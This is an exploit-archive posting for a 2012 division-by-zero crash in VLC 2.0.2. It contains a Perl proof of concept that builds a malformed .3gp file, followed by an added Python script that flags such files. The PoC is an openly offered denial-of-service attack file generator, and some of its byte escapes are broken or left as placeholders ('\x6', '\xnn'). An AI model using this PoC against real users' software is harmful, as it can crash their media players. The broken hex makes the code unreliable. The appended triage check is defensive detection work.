>> Exploit database separated by exploit type (local, remote, DoS, etc.)

[x] Official Website: http://www.1337day.com
[x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com

==========================================
I'm Dark-Puzzle From Inj3ct0r TEAM
dark-puzzle[at]live[at]fr
==========================================
Pentesting/exploit coding/bug research

# Exploit Title: VLC 2.0.2 - .3gp Division By Zero.
# Author: Dark-Puzzle
# Danger: Medium
# Category: Local Exploit
# Version: Latest; 2.0.2 Twoflower (previous versions are not tested but may be vulnerable)
# Vendor: www.videolan.org
# Software Link: http://www.videolan.org/vlc/releases/2.0.2.html
# Date: 02 Aug 2012
----------------------------------------------------------------------------------------
The division by zero causes all playlist DLLs to stop responding, so nothing can be
played until VLC is closed through the Task Manager.
----------------------------------------------------------------------------------------
PoC :

#!/usr/bin/perl
# 14-byte header: "MThd", length 6, remaining fields zero
my $a ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
# "ftyp3gp" marker (the \xnn byte is not specified in the advisory)
my $b ="\x00\x00\x00\xnn\x66\x74\x79\x70\x33\x67\x70";
# filler text between the header and the footer
my $c ="\x62\x6\x74\x77\x65\x65\x6e\x20\x74\x68\x65\x20\x68\x65\x61\x64\x65\x72\x20\x61
\x6e\x64\x20\x74\x68\x65\x20\x66\x6f\x6f\x74\x65\x72\x20\x74\x68\x65\x72\x65\x27
\x73\x20\x64\x61\x72\x6b\x2d\x70\x75\x7a\x7a\x6c\x65";
# footer: "3gp"
my $d ="\x33\x67\x70";
my $file = "darkpuzzle.3gp";
# write the four parts to the output file
open ($File, ">$file");
print $File $a,$b,$c,$d;
close ($File);

-----------------------------------------------------------------------------------------
* Dark-Puzzle From Datasec Team
* Greetz 2 : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstormsecurity.org
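
The first 14 bytes the PoC writes are a Standard MIDI File header chunk ("MThd", length 6) with every remaining field zero, saved under a .3gp name. The following triage check is an added example, not part of the original advisory: it flags that extension/content mismatch and the zero fields before a file reaches a player. The function triage, the finding names and the sample byte strings are hypothetical, and the advisory itself does not say which field VLC divides by.

```python
import struct

# Constructed samples (not real media). POC_HEAD repeats the 14 bytes of $a above.
POC_HEAD = b"MThd" + struct.pack(">IHHH", 6, 0, 0, 0)
GOOD_MIDI = b"MThd" + struct.pack(">IHHH", 6, 1, 2, 480)
GOOD_3GP = struct.pack(">I4s4sI4s", 20, b"ftyp", b"3gp5", 0, b"isom")

# Extensions whose files should start with an ISO BMFF 'ftyp' box.
BMFF_EXTS = (".3gp", ".3g2", ".mp4", ".m4a")


def triage(name, data):
    """Return a list of finding strings for one file; an empty list means clean."""
    findings = []
    named_bmff = name.lower().endswith(BMFF_EXTS)

    if data[:4] == b"MThd":
        # Content is a Standard MIDI File, whatever the extension says.
        if named_bmff:
            findings.append("ext-mismatch")
        if len(data) < 14:
            findings.append("midi-truncated-header")
            return findings
        length, _fmt, ntrks, division = struct.unpack(">IHHH", data[4:14])
        if length != 6:
            findings.append("midi-bad-header-length")
        if ntrks == 0:
            findings.append("midi-no-tracks")
        # division = ticks per quarter note (or SMPTE timing if the top bit
        # is set); zero leaves a player with no usable time base.
        if division == 0:
            findings.append("midi-division-zero")
    elif named_bmff:
        if len(data) < 8 or data[4:8] != b"ftyp":
            findings.append("bmff-missing-ftyp")
        else:
            (size,) = struct.unpack(">I", data[:4])
            # ftyp holds at least size, type, major brand, minor version.
            if size < 16 or size > len(data):
                findings.append("bmff-bad-ftyp-size")
    return findings


if __name__ == "__main__":
    for name, blob in [("darkpuzzle.3gp", POC_HEAD), ("song.mid", GOOD_MIDI),
                       ("clip.3gp", GOOD_3GP)]:
        print(name, triage(name, blob) or "clean")
```
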